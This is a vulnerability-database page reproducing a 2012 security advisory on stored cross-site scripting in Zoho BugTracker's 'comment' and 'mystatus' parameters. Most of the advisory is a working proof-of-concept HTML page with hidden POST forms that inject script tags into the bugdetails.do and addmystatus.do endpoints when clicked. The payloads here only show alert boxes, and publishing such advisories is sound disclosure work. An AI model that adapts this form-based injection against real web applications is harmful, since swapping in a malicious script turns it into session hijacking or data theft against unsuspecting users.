Lucene search
K

Zoho BugTracker Multiple Stored XSS Vulnerabilities

🗓️ 06 Aug 2012 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 20 Views

Zoho BugTracker Stored XSS Vulnerability in Comment and Mystatus Parameter

Code
<!--

Zoho BugTracker Multiple Stored XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd
Product web page: http://www.zoho.com
Affected version: N/A

Summary: Zoho Bug Tracker is an online bug tracking software that
combines a clean and an intuitive interface to submit and track bugs
with custom workflows, business rules, custom fields and filters for
the bugs that software projects are bound to generate and fix all bugs
fast.

Desc: The Bug Tracking Software suffers from a stored XSS vulnerability
when parsing user input to the 'comment' and 'mystatus' parameters via
POST method thru 'bugdetails.do' and 'addmystatus.do' scripts. Attackers
can exploit these weaknesses to execute arbitrary HTML and script code
in a user's browser session.


Tested on: Microsoft Windows XP Professional SP3 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5096
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5096.php


06.08.2012

--><html>
<head><title>Zoho BugTracker Multiple Stored XSS Vulnerabilities</title>
</head><body bgcolor="#000000">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<form action="https://[HOST]/portal/[USER]/bugdetails.do?action=addcomment" enctype="application/x-www-form-urlencoded" id="xss1" method="POST">
<input name="action" type="hidden" value="addcomment"/>
<input name="projId" type="hidden" value="478405000000013273"/>
<input name="issueId" type="hidden" value="478405000000013347"/>
<input name="zpcp" type="hidden" value="1f91d0fa-9a61-4aab-898c-f023ac4c44fc"/>
<input name="fromPage" type="hidden" value="bugcomments"/>
<input name="comment" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="uploadfile" type="hidden" value=""/>
</form>
<form action="https://[HOST]/portal/[USER]/addmystatus.do" enctype="application/x-www-form-urlencoded" id="xss2" method="POST">
<input name="mystatus" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="projId" type="hidden" value="478405000000013273"/>
<input name="targetid" type="hidden" value="latestactivity"/>
<input name="zpcp" type="hidden" value="1f91d0fa-9a61-4aab-898c-f023ac4c44fc"/>
</form><center>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br/>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br/>
</center></body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation